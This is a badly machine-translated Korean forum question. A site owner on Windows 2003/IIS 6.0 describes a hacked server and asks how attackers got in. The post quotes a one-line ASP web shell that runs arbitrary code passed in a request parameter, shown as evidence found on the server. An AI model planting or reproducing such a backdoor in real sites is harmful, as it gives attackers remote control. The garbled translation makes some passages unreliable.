내 고객 중 한 명이 Google 검색 결과에 자신의 웹 사이트가 해킹 당했을 수 있다는 메시지를 보았습니다. 파고가 끝난 후, 서재응 쓰레기 및 자바 스크립트 참조가 포함 된 서버에서 html 파일을 발견했습니다. 나는이 라인나는 해킹 당했고 조언을 구하고 있다고 생각합니다.
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
으로 해당 파일, CMS 암호를 변경할 등 CKFinder 같은 업데이트 된 일부 구성 요소 ... .ASP 파일의
내가 다음 서버에있는 다른 사이트에 찾기 시작 발견 톤 제거 나는 그것들을 제거했지만 그들이 어떻게 거기에 갔는지 모른다. 다양한 로그 (이벤트 뷰어, 웹 사이트, ftp)를 살펴 봤지만 대부분의 경우 파일이 생성 될 때부터 멀리 가지 않습니다.
한 달 또는 두 달 밖에 지나지 않은 OS를 업데이트하고 ftp 액세스를 변경했습니다.
입력 지점을 찾거나 내 서버와 사이트가 안전한지 확인하려면 어떻게해야합니까?
BTW : IIS 6.0을 실행하는 Windows 2003 서버입니다.
윈도우 2003은 "한 달 또는 날짜 중 두"입니다 : 그 외에는
, 이번 주에 패치 된 윈도우 서버에 몇 가지 취약점이있다,이 링크를 체크 아웃? – geoffspear
Windows 업데이트를 참조하는 중 ... – SirM